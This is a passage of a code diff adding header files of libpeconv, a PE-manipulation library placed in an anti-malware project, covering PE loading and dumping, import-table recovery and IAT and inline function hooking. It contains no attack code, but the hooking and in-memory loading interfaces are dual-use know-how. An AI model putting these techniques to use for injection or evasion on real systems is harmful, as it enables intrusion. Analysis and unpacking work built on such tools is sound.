+    Automatically allocates a buffer of the required size.
+    */
+    peconv::ALIGNED_BUF read_from_file(IN const char *path, IN OUT size_t &read_size);
+
+    /**
+    Writes a buffer of bytes into a file of given path.
+ \param path : the path to the output file + \param dump_data : the buffer to be dumped + \param dump_size : the size of data to be dumped (in bytes) + \return true if succeeded, false if failed + */ + bool dump_to_file(IN const char *path, IN PBYTE dump_data, IN size_t dump_size); + + /** + Free the buffer allocated by load_file/read_from_file + */ + void free_file(IN peconv::ALIGNED_BUF buffer); + + /** + Get the file name from the given path. + */ + std::string get_file_name(IN const std::string full_path); + + /** + Get the directory name from the given path. It assumes that a directory name always ends with a separator ("/" or "\") + */ + std::string get_directory_name(IN const std::string full_path); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/find_base.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/find_base.h new file mode 100644 index 0000000..f49b030 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/find_base.h @@ -0,0 +1,20 @@ +/** +* @file +* @brief Functions related to finding a base to which the module was relocated. +*/ + +#pragma once + +#include + +namespace peconv { + + /** + Try to find a base to which the PE file was relocated, basing on the filled relocations. + WARNING: the found base is an estimate, and sometimes may not be fully accurate. + \param module_ptr : the module which's base is being searched + \param module_size : the size of the given module + \return the base to which the module was relocated + */ + ULONGLONG find_base_candidate(IN BYTE *module_ptr, IN size_t module_size); +}; diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/fix_imports.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/fix_imports.h new file mode 100644 index 0000000..a915df7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/fix_imports.h @@ -0,0 +1,119 @@ +/** +* @file +* @brief Functions and classes responsible for fixing Import Table. 
A definition of ImportedDllCoverage class. +*/ + +#pragma once + +#include + +#include + +#include +#include + +#include + +#include "pe_hdrs_helper.h" +#include "exports_lookup.h" +#include "exports_mapper.h" + +#define MIN_DLL_LEN 5 + +namespace peconv { + + /** + a helper class that allows to store information about functions that could not be covered by the given mapping + */ + class ImpsNotCovered + { + public: + ImpsNotCovered() {} + ~ImpsNotCovered() {} + + /* + Number of stored records + */ + size_t count() { return thunkToAddr.size(); } + + void insert(ULONGLONG thunk, ULONGLONG searchedAddr); + + std::map thunkToAddr; //addresses of not recovered functions with their thunks (call_via) + }; + + /** + fix imports in the given module, using the given map of all available exports + */ + bool fix_imports(IN OUT PVOID modulePtr, IN size_t moduleSize, IN const peconv::ExportsMapper& exportsMap, OUT OPTIONAL peconv::ImpsNotCovered* notCovered); + + /** + a helper class that allows to find out where the functions are imported from + */ + class ImportedDllCoverage + { + public: + /** + A constructor of an object of ImportedDllCoverage class. + \param _addresses : the list of filled imports (VAs): the addresses to be covered + \param _exportsMap : the map of the exports of all the loaded DLLs (the space in which we will be searching) + */ + ImportedDllCoverage(std::set& _addresses, const peconv::ExportsMapper& _exportsMap) + : addresses(_addresses), exportsMap(_exportsMap) + { + } + + /** + Checks if all the addresses can be covered by one DLL. If yes, this dll will be saved into: dllName. + \return true if the covering DLL for the addresses was found. false otherwise. + */ + bool findCoveringDll(); + + /** + Maps the addresses from the set to functions from the given DLL. + Results are saved into: addrToFunc. + Addresses that could not be covered by the given DLL are saved into notFound. + Before each execution, the content of involved variables is erased. 
+ \param _mappedDllName : the name of the DLL that we will be used to mapping. This DLL is saved into mappedDllName. + \return a number of covered functions + */ + size_t mapAddressesToFunctions(const std::string &_mappedDllName); + + /** + Check if the functions mapping is complete. + \return the status: true if all the addresses are mapped to specific exports, false if not + */ + bool isMappingComplete() { return (addresses.size() == addrToFunc.size()) ? true : false; } + + /** + A mapping associating each of the covered function addresses with the set of exports (from mapped DLL) that cover this address + */ + std::map> addrToFunc; + + /** + Addresses of the functions not found in the mapped DLL + */ + std::set notFound; + + /** + Name of the covering DLL + */ + std::string dllName; + + protected: + /** + A name of the DLL that was used for mapping. In a typical scenario it will be the same as covering DLL, but may be set different. + */ + std::string mappedDllName; + + /** + A supplied set of the addresses of imported functions. + Those addressed will be covered (associated with the corresponding exports from available DLLs, defined by exportsMap). + */ + std::set &addresses; + + /** + A supplied exportsMap. Only used as a lookup, no changes applied. + */ + const peconv::ExportsMapper& exportsMap; + }; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/function_resolver.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/function_resolver.h new file mode 100644 index 0000000..8b9fd70 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/function_resolver.h @@ -0,0 +1,39 @@ +/** +* @file +* @brief Definitions of basic Imports Resolver classes. They can be used for filling imports when the PE is loaded. +*/ + +#pragma once + +#include + +namespace peconv { + /** + A base class for functions resolver. 
+    */
+    class t_function_resolver {
+    public:
+        // polymorphic base: a virtual destructor is required so that deleting a
+        // derived resolver through a t_function_resolver* is well-defined
+        virtual ~t_function_resolver() {}
+
+        /**
+        Get the address (VA) of the function with the given name, from the given DLL.
+        \param func_name : the name of the function
+        \param lib_name : the name of the DLL
+        \return Virtual Address of the exported function
+        */
+        virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name) = 0;
+    };
+
+    /**
+    A default functions resolver, using LoadLibraryA and GetProcAddress.
+    */
+    class default_func_resolver : t_function_resolver {
+    public:
+        /**
+        Get the address (VA) of the function with the given name, from the given DLL, using LoadLibraryA and GetProcAddress.
+        \param func_name : the name of the function
+        \param lib_name : the name of the DLL
+        \return Virtual Address of the exported function
+        */
+        virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name);
+    };
+
+}; //namespace peconv
diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/hooks.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/hooks.h
new file mode 100644
index 0000000..ab55dbc
--- /dev/null
+++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/hooks.h
@@ -0,0 +1,135 @@
+/**
+* @file
+* @brief Functions related to hooking the loaded PE. Redirecting/replacing a function with another.
+*/
+
+#pragma once
+
+#include <windows.h> // NOTE(review): include targets lost in transfer; restored - verify against upstream
+#include "function_resolver.h"
+
+#include <iostream> // NOTE(review): restored include target - verify
+#include <map>      // NOTE(review): restored include target (std::map used below) - verify
+#include <string>   // NOTE(review): restored include target (std::string used below) - verify
+#include "peconv/buffer_util.h"
+
+namespace peconv {
+
+    /**
+    A buffer storing a binary patch, that can be applied on a module. Used as a restorable backup in case of function patching.
+    */
+    class PatchBackup {
+    public:
+        /**
+        Creates an empty backup.
+        */
+        PatchBackup()
+            : buffer(nullptr), bufferSize(0), sourcePtr(nullptr)
+        {
+        }
+
+        ~PatchBackup() {
+            deleteBackup();
+        }
+
+        /**
+        Destroys the backup and resets internal fields.
+        */
+        void deleteBackup()
+        {
+            if (buffer) {
+                delete[] buffer;
+                buffer = nullptr; // FIX: without this the pointer dangles, isBackup() keeps returning true, and a second call (e.g. from the destructor) double-deletes
+                bufferSize = 0;
+                sourcePtr = nullptr;
+            }
+        }
+
+        /**
+        Reads bytes from the binary to the backup.
The source buffer must be within the current process. + */ + bool makeBackup(BYTE *patch_ptr, size_t patch_size); + + /** + Applies the backup back to the pointer from which it was read. + */ + bool applyBackup(); + + /** + Checks if the buffer was filled. + */ + bool isBackup() + { + return buffer != nullptr; + } + + protected: + BYTE *buffer; + size_t bufferSize; + + BYTE *sourcePtr; + }; + + + /** + A functions resolver that can be used for hooking IAT. Allows for defining functions that are supposed to be replaced. + */ + class hooking_func_resolver : peconv::default_func_resolver { + public: + /** + Define a function that will be replaced. + \param name : a name of the function that will be replaced + \param function : an address of the replacement function + */ + void add_hook(std::string name, FARPROC function) + { + hooks_map[name] = function; + } + + /** + Get the address (VA) of the function with the given name, from the given DLL. If the function was hooked, it retrieves the address of the replacement function instead. + \param func_name : the name of the function + \param lib_name : the name of the DLL + \return Virtual Address of the exported function, or the address of the replacement function. + */ + virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name); + + private: + std::map hooks_map; + }; + + /** + Installs inline hook at the given ptr. Returns the number of bytes overwriten. + 64 bit version. + \param ptr : pointer to the function to be replaced + \param new_offset : VA of the new function + \param backup : (optional) backup that can be used to reverse the changes + \return size of the applied patch + */ + size_t redirect_to_local64(void *ptr, ULONGLONG new_offset, PatchBackup* backup = nullptr); + + /** + Installs inline hook at the given ptr. Returns the number of bytes overwriten. + 32 bit version. 
+     \param ptr : pointer to the function to be replaced
+     \param new_offset : VA of the new function
+     \param backup : (optional) backup that can be used to reverse the changes
+     \return size of the applied patch
+     */
+     size_t redirect_to_local32(void *ptr, DWORD new_offset, PatchBackup* backup = nullptr);
+
+     /**
+     Installs inline hook at the given ptr. Returns the number of bytes overwritten.
+     Uses the bitness of the current application for the bitness of the installed hook.
+     \param ptr : pointer to the function to be replaced
+     \param new_function_ptr : pointer to the new function
+     \param backup : (optional) backup that can be used to reverse the changes
+     \return size of the applied patch
+     */
+     size_t redirect_to_local(void *ptr, void* new_function_ptr, PatchBackup* backup = nullptr);
+
+     /**
+     Replaces a target address of JMP [DWORD] or CALL [DWORD]
+     */
+     bool replace_target(BYTE *ptr, ULONGLONG dest_addr);
+
+};//namespace peconv
diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_loader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_loader.h
new file mode 100644
index 0000000..4a485e6
--- /dev/null
+++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_loader.h
@@ -0,0 +1,70 @@
+/**
+* @file
+* @brief Parsing and filling the Import Table.
+*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" +#include "function_resolver.h" + +namespace peconv { + + /** + A class defining a callback that will be executed when the next imported function was found + */ + class ImportThunksCallback + { + public: + ImportThunksCallback(BYTE* _modulePtr, size_t _moduleSize) + : modulePtr(_modulePtr), moduleSize(_moduleSize) + { + this->is64b = is64bit((BYTE*)modulePtr); + } + + /** + A callback that will be executed by process_import_table when the next imported function was found + \param libName : the pointer to the DLL name + \param origFirstThunkPtr : the pointer to the Original First Thunk + \param firstThunkPtr : the pointer to the First Thunk + \return : true if processing succeeded, false otherwise + */ + virtual bool processThunks(LPSTR libName, ULONG_PTR origFirstThunkPtr, ULONG_PTR firstThunkPtr) = 0; + + protected: + BYTE* modulePtr; + size_t moduleSize; + bool is64b; + }; + + /** + Process the given PE's import table and execute the callback each time when the new imported function was found + \param modulePtr : a pointer to the loded PE (in virtual format) + \param moduleSize : a size of the supplied PE + \param callback : a callback that will be executed to process each imported function + \return : true if processing succeeded, false otherwise + */ + bool process_import_table(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ImportThunksCallback *callback); + + /** + Fills imports of the given PE with the help of the defined functions resolver. + \param modulePtr : a pointer to the loded PE (in virtual format) + \param func_resolver : a resolver that will be used to fill the thunk of the import + \return : true if loading all functions succeeded, false otherwise + */ + bool load_imports(BYTE* modulePtr, t_function_resolver* func_resolver=nullptr); + + /** + Checks if the given PE has a valid import table. 
+ */ + bool has_valid_import_table(const PBYTE modulePtr, size_t moduleSize); + + /** + Checks if the given lib_name is a valid DLL name. + A valid name must contain printable characters. Empty name is also acceptable (may have been erased). + */ + bool is_valid_import_name(const PBYTE modulePtr, const size_t moduleSize, LPSTR lib_name); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_uneraser.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_uneraser.h new file mode 100644 index 0000000..274bfc7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_uneraser.h @@ -0,0 +1,94 @@ +/** +* @file +* @brief A definition of ImportsUneraser class - for recovery of a partialy erased Import Table. +*/ + +#pragma once + +#include + +#include + +#include +#include + +#include +#include "fix_imports.h" +#include "caves.h" + +namespace peconv { + + /** + A class responsible for recovering the partially erased Import Table from the PE. + */ + class ImportsUneraser + { + public: + ImportsUneraser(PVOID _modulePtr, size_t _moduleSize) + : modulePtr((PBYTE)_modulePtr), moduleSize(_moduleSize) + { + is64 = peconv::is64bit((BYTE*)modulePtr); + } + + /** + Fill the imported functions' names in the given Import Descriptor, using the given coverage. + Collect addressees of functions that couldn't be filled with the given mapping. + \param lib_desc : the IMAGE_IMPORT_DESCRIPTOR where the functions' names should be set + \param dllCoverage : a mapping associating addresses with the corresponding exports from available DLLs + \param not_covered : a set of addresses that could not be found in the supplied mapping + \return true if succeeded + */ + bool uneraseDllImports(IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, IN ImportedDllCoverage &dllCoverage, OUT OPTIONAL ImpsNotCovered* not_covered); + + /** + Recover the imported DLL name in the given Import Descriptor, filling it with the given dll_name. 
+ */ + bool uneraseDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &dll_name); + + protected: + /** + Copy the given DLL name into the given IMAGE_IMPORT_DESCRIPTOR. Validates the data correctness before writing. + \param lib_desc : the IMAGE_IMPORT_DESCRIPTOR where the DLL name should be set + \param dll_name : the DLL name that needs to be written into the lib_desc + \return true if succeeded + */ + bool writeFoundDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &dll_name); + + /** + Fill the names of imported functions with names of the prepared mapping. + Collect addressees of functions that couldn't be filled with the given mapping. + \param lib_desc : the IMAGE_IMPORT_DESCRIPTOR where the functions' names should be set + \param ordinal_flag : the flag that is used to recognize import by ordinal (32 or 64 bit) + \param addr_to_func : a mapping assigning functions' addresses to their definitions (names etc.) + \param not_covered : a set of addresses that could not be found in the supplied mapping + \return true if succeeded + */ + template + bool fillImportNames(IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, + IN const FIELD_T ordinal_flag, + IN std::map> &addr_to_func, + OUT OPTIONAL ImpsNotCovered* not_covered + ); + + template + bool findNameInBinaryAndFill(IMAGE_IMPORT_DESCRIPTOR* lib_desc, + LPVOID call_via_ptr, + LPVOID thunk_ptr, + const FIELD_T ordinal_flag, + std::map> &addr_to_func + ); + + /** + Fill the function data into the given IMAGE_THUNK_DATA. 
+ \param desc : the poiner to IMAGE_THUNK_DATA that will be filled + \param ordinal_flag : an ordinal flag: 32 or 64 bit + \param foundFunc : the ExportedFunc that will be used for filling the desc + */ + template + bool writeFoundFunction(IMAGE_THUNK_DATA_T* desc, const FIELD_T ordinal_flag, const ExportedFunc &foundFunc); + + PBYTE modulePtr; + size_t moduleSize; + bool is64; + }; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_defs.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_defs.h new file mode 100644 index 0000000..daa902f --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_defs.h @@ -0,0 +1,228 @@ +#pragma once +#include + +#include + +namespace peconv { + + /** + IMAGE_LOAD_CONFIG_CODE_INTEGRITY: a structure used by IMAGE_LOAD_CONFIG_DIR - the Windows 10 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10 { + WORD Flags; // Flags to indicate if CI information is available, etc. + WORD Catalog; // 0xFFFF means not available + DWORD CatalogOffset; + DWORD Reserved; // Additional bitmask to be defined later + } IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10; + + /** + IMAGE_LOAD_CONFIG_DIR32: the Windows 10 version. 
+ */ + typedef struct _IMAGE_LOAD_CONFIG_DIR32_W10 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + DWORD DeCommitFreeBlockThreshold; + DWORD DeCommitTotalFreeThreshold; + DWORD LockPrefixTable; // VA + DWORD MaximumAllocationSize; + DWORD VirtualMemoryThreshold; + DWORD ProcessHeapFlags; + DWORD ProcessAffinityMask; + WORD CSDVersion; + WORD DependentLoadFlags; + DWORD EditList; // VA + DWORD SecurityCookie; // VA + DWORD SEHandlerTable; // VA + DWORD SEHandlerCount; + DWORD GuardCFCheckFunctionPointer; // VA + DWORD GuardCFDispatchFunctionPointer; // VA + DWORD GuardCFFunctionTable; // VA + DWORD GuardCFFunctionCount; + DWORD GuardFlags; + IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10 CodeIntegrity; + DWORD GuardAddressTakenIatEntryTable; // VA + DWORD GuardAddressTakenIatEntryCount; + DWORD GuardLongJumpTargetTable; // VA + DWORD GuardLongJumpTargetCount; + DWORD DynamicValueRelocTable; // VA + DWORD CHPEMetadataPointer; + DWORD GuardRFFailureRoutine; // VA + DWORD GuardRFFailureRoutineFunctionPointer; // VA + DWORD DynamicValueRelocTableOffset; + WORD DynamicValueRelocTableSection; + WORD Reserved2; + DWORD GuardRFVerifyStackPointerFunctionPointer; // VA + DWORD HotPatchTableOffset; + DWORD Reserved3; + DWORD EnclaveConfigurationPointer; // VA + } IMAGE_LOAD_CONFIG_DIR32_W10; + + /** + IMAGE_LOAD_CONFIG_DIR64: the Windows 10 version. 
+ */ + typedef struct _IMAGE_LOAD_CONFIG_DIR64_W10 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + ULONGLONG DeCommitFreeBlockThreshold; + ULONGLONG DeCommitTotalFreeThreshold; + ULONGLONG LockPrefixTable; // VA + ULONGLONG MaximumAllocationSize; + ULONGLONG VirtualMemoryThreshold; + ULONGLONG ProcessAffinityMask; + DWORD ProcessHeapFlags; + WORD CSDVersion; + WORD DependentLoadFlags; + ULONGLONG EditList; // VA + ULONGLONG SecurityCookie; // VA + ULONGLONG SEHandlerTable; // VA + ULONGLONG SEHandlerCount; + ULONGLONG GuardCFCheckFunctionPointer; // VA + ULONGLONG GuardCFDispatchFunctionPointer; // VA + ULONGLONG GuardCFFunctionTable; // VA + ULONGLONG GuardCFFunctionCount; + DWORD GuardFlags; + IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10 CodeIntegrity; + ULONGLONG GuardAddressTakenIatEntryTable; // VA + ULONGLONG GuardAddressTakenIatEntryCount; + ULONGLONG GuardLongJumpTargetTable; // VA + ULONGLONG GuardLongJumpTargetCount; + ULONGLONG DynamicValueRelocTable; // VA + ULONGLONG CHPEMetadataPointer; // VA + ULONGLONG GuardRFFailureRoutine; // VA + ULONGLONG GuardRFFailureRoutineFunctionPointer; // VA + DWORD DynamicValueRelocTableOffset; + WORD DynamicValueRelocTableSection; + WORD Reserved2; + ULONGLONG GuardRFVerifyStackPointerFunctionPointer; // VA + DWORD HotPatchTableOffset; + DWORD Reserved3; + ULONGLONG EnclaveConfigurationPointer; // VA + } IMAGE_LOAD_CONFIG_DIR64_W10; + + /** + IMAGE_LOAD_CONFIG_DIR32: the Windows 8 version. 
+ */ + typedef struct _IMAGE_LOAD_CONFIG_DIR32_W8 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + DWORD DeCommitFreeBlockThreshold; + DWORD DeCommitTotalFreeThreshold; + DWORD LockPrefixTable; // VA + DWORD MaximumAllocationSize; + DWORD VirtualMemoryThreshold; + DWORD ProcessHeapFlags; + DWORD ProcessAffinityMask; + WORD CSDVersion; + WORD DependentLoadFlags; + DWORD EditList; // VA + DWORD SecurityCookie; // VA + DWORD SEHandlerTable; // VA + DWORD SEHandlerCount; + DWORD GuardCFCheckFunctionPointer; // VA + DWORD GuardCFDispatchFunctionPointer; // VA + DWORD GuardCFFunctionTable; // VA + DWORD GuardCFFunctionCount; + DWORD GuardFlags; + } IMAGE_LOAD_CONFIG_DIR32_W8; + + /** + IMAGE_LOAD_CONFIG_DIR64: the Windows 8 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR64_W8 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + ULONGLONG DeCommitFreeBlockThreshold; + ULONGLONG DeCommitTotalFreeThreshold; + ULONGLONG LockPrefixTable; // VA + ULONGLONG MaximumAllocationSize; + ULONGLONG VirtualMemoryThreshold; + ULONGLONG ProcessAffinityMask; + DWORD ProcessHeapFlags; + WORD CSDVersion; + WORD DependentLoadFlags; + ULONGLONG EditList; // VA + ULONGLONG SecurityCookie; // VA + ULONGLONG SEHandlerTable; // VA + ULONGLONG SEHandlerCount; + ULONGLONG GuardCFCheckFunctionPointer; // VA + ULONGLONG GuardCFDispatchFunctionPointer; // VA + ULONGLONG GuardCFFunctionTable; // VA + ULONGLONG GuardCFFunctionCount; + DWORD GuardFlags; + } IMAGE_LOAD_CONFIG_DIR64_W8; + + + /** + IMAGE_LOAD_CONFIG_DIR32: the Windows 7 version. 
+ */ + typedef struct _IMAGE_LOAD_CONFIG_DIR32_W7 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + DWORD DeCommitFreeBlockThreshold; + DWORD DeCommitTotalFreeThreshold; + DWORD LockPrefixTable; // VA + DWORD MaximumAllocationSize; + DWORD VirtualMemoryThreshold; + DWORD ProcessHeapFlags; + DWORD ProcessAffinityMask; + WORD CSDVersion; + WORD DependentLoadFlags; + DWORD EditList; // VA + DWORD SecurityCookie; // VA + DWORD SEHandlerTable; // VA + DWORD SEHandlerCount; + } IMAGE_LOAD_CONFIG_DIR32_W7; + + /** + IMAGE_LOAD_CONFIG_DIR64: the Windows 7 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR64_W7 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + ULONGLONG DeCommitFreeBlockThreshold; + ULONGLONG DeCommitTotalFreeThreshold; + ULONGLONG LockPrefixTable; // VA + ULONGLONG MaximumAllocationSize; + ULONGLONG VirtualMemoryThreshold; + ULONGLONG ProcessAffinityMask; + DWORD ProcessHeapFlags; + WORD CSDVersion; + WORD DependentLoadFlags; + ULONGLONG EditList; // VA + ULONGLONG SecurityCookie; // VA + ULONGLONG SEHandlerTable; // VA + ULONGLONG SEHandlerCount; + } IMAGE_LOAD_CONFIG_DIR64_W7; +}; //namespace peconv + +#include diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_util.h new file mode 100644 index 0000000..52b01be --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_util.h @@ -0,0 +1,42 @@ +/** +* @file +* @brief Fetching Load Config Directory and recognizing its version. +*/ + +#pragma once +#include + +#include "buffer_util.h" +#include "load_config_defs.h" + +namespace peconv { + + /** + A version of Load Config Directory. 
+ */ + typedef enum { + LOAD_CONFIG_NONE = 0, /**< Load Config Directory not found */ + LOAD_CONFIG_W7_VER = 7, /**< Load Config Directory in the Windows 7 version */ + LOAD_CONFIG_W8_VER = 8, /**< Load Config Directory in the Windows 8 version */ + LOAD_CONFIG_W10_VER = 10, /**< Load Config Directory in the Windows 10 version */ + LOAD_CONFIG_UNK_VER = -1 /**< Load Config Directory in an unknown version */ + } t_load_config_ver; + + /** + Get a pointer to the Load Config Directory within the given PE. + \param buffer : a buffer containing the PE file in a Virtual format + \param buf_size : size of the buffer + \return a pointer to the Load Config Directory, NULL if the given PE does not have this directory + */ + BYTE* get_load_config_ptr(BYTE* buffer, size_t buf_size); + + /** + Detect which version of Load Config Directory was used in the given PE. + \param buffer : a buffer containing the PE file in a Virtual format + \param buf_size : size of the buffer + \param ld_config_ptr : pointer to the Load Config Directory within the given PE + \return detected version of Load Config Directory + */ + t_load_config_ver get_load_config_version(BYTE* buffer, size_t buf_size, BYTE* ld_config_ptr); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_dumper.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_dumper.h new file mode 100644 index 0000000..3388c5b --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_dumper.h @@ -0,0 +1,48 @@ +/** +* @file +* @brief Dumping PE from the memory buffer into a file. +*/ + +#pragma once + +#include +#include "exports_mapper.h" + +namespace peconv { + + /** + A mode in which the PE fille be dumped. 
+ */ + typedef enum { + PE_DUMP_AUTO = 0, /**< autodetect which dump mode is the most suitable for the given input */ + PE_DUMP_VIRTUAL,/**< dump as it is in the memory (virtual) */ + PE_DUMP_UNMAP, /**< convert to the raw format: using raw sections' headers */ + PE_DUMP_REALIGN, /**< convert to the raw format: by realigning raw sections' headers to be the same as virtual (useful if the PE was unpacked in memory) */ + PE_DUMP_MODES_COUNT /**< total number of the dump modes */ + } t_pe_dump_mode; + + /** + Detect dump mode that is the most suitable for the given input. + \param buffer : the buffer containing the PE to be dumped. + \param buffer_size : the size of the given buffer + */ + t_pe_dump_mode detect_dump_mode(IN const BYTE* buffer, IN size_t buffer_size); + + /** + Dumps PE from the fiven buffer into a file. It expects the module base and size to be given. + \param outputFilePath : name of the file where the dump should be saved + \param buffer : the buffer containing the PE to be dumped. WARNING: the buffer may be preprocessed before dumping. + \param buffer_size : the size of the given buffer + \param module_base : the base to which the PE buffer was relocated + \param dump_mode : specifies in which format the PE should be dumped. If the mode was set to PE_DUMP_AUTO, it autodetects mode and returns the detected one. + \param exportsMap : optional. If exportsMap is supplied, it will try to recover destroyed import table of the PE, basing on the supplied map of exported functions. 
+ */ + bool dump_pe(IN const char *outputFilePath, + IN OUT BYTE* buffer, + IN size_t buffer_size, + IN const ULONGLONG module_base, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL const peconv::ExportsMapper* exportsMap = nullptr + ); + +};// namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_hdrs_helper.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_hdrs_helper.h new file mode 100644 index 0000000..7a7eb4e --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_hdrs_helper.h @@ -0,0 +1,232 @@ +/** +* @file +* @brief Wrappers over various fields in the PE header. Read, write, parse PE headers. +*/ + +#pragma once + +#include +#include "buffer_util.h" + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif + +#define MASK_TO_DWORD(val) (val & 0xffffffff) +#define MASK_TO_WORD(val) (val & 0xffff) + +namespace peconv { + /** + Maximal size of the PE header. + */ + const ULONGLONG MAX_HEADER_SIZE = PAGE_SIZE; + + /** + Fetch image size from headers. + */ + DWORD get_image_size(IN const BYTE *payload); + + /** + Change the Image Size in Optional Header to the given one. + */ + bool update_image_size(IN OUT BYTE* payload, IN DWORD new_img_size); + + /** + Fetch architecture from the NT headers. Checks for bad pointers. + */ + WORD get_nt_hdr_architecture(IN const BYTE *pe_buffer); + + /** + Wrapper for get_nt_hdr_architecture. Returns true if the PE file is 64 bit. + */ + bool is64bit(IN const BYTE *pe_buffer); + + /** + Fetch pointer to the NT headers of the PE file. + Checks for bad pointers. If buffer_size is set, validates pointers against the buffer size. + */ + BYTE* get_nt_hdrs( + IN const BYTE *pe_buffer, + IN OPTIONAL size_t buffer_size=0 //if buffer_size=0 means size unknown + ); + + /** + Wrapper for get_nt_headers. Automatically detects if the PE is 32 bit - if not, returns null pointer. + */ + IMAGE_NT_HEADERS32* get_nt_hdrs32(IN const BYTE *pe_buffer); + + /** + Wrapper for get_nt_headers. 
Automatically detects if the PE is 64 bit - if not, returns null pointer. + */ + IMAGE_NT_HEADERS64* get_nt_hdrs64(IN const BYTE *pe_buffer); + + /** + Fetches optional header of the PE. Validates pointers against buffer size. + */ + LPVOID get_optional_hdr(IN const BYTE* payload, IN const size_t buffer_size); + + /** + Fetches file header of the PE. Validates pointers against buffer size. + */ + const IMAGE_FILE_HEADER* get_file_hdr( + IN const BYTE* payload, + IN const size_t buffer_size + ); + + /** + Fetch the size of headers (from Optional Header). + */ + DWORD get_hdrs_size(IN const BYTE *pe_buffer); + + /** + get Data Directory entry of the given number. If the entry is not filled and allow_empty is not set, it returns null pointer. + */ + IMAGE_DATA_DIRECTORY* get_directory_entry(IN const BYTE* pe_buffer, IN DWORD dir_id, IN bool allow_empty = false); + + /** + Get pointer to the Data Directory content of the given number. Automatically cast to the chosen type. + */ + template + IMAGE_TYPE_DIRECTORY* get_type_directory(IN HMODULE modulePtr, IN DWORD dir_id) + { + IMAGE_DATA_DIRECTORY *my_dir = peconv::get_directory_entry((const BYTE*)modulePtr, dir_id); + if (!my_dir) return nullptr; + + DWORD dir_addr = my_dir->VirtualAddress; + if (dir_addr == 0) return nullptr; + + return (IMAGE_TYPE_DIRECTORY*)(dir_addr + (ULONG_PTR)modulePtr); + } + + /** + Get pointer to the Export Directory. + */ + IMAGE_EXPORT_DIRECTORY* get_export_directory(IN HMODULE modulePtr); + + // Fetch Image Base from Optional Header. + ULONGLONG get_image_base(IN const BYTE *pe_buffer); + + /** + Change the Image Base in Optional Header to the given one. + */ + bool update_image_base(IN OUT BYTE* payload, IN ULONGLONG destImageBase); + + /** + Get RVA of the Entry Point from the Optional Header. + */ + DWORD get_entry_point_rva(IN const BYTE *pe_buffer); + + /** + Change the Entry Point RVA in the Optional Header to the given one. 
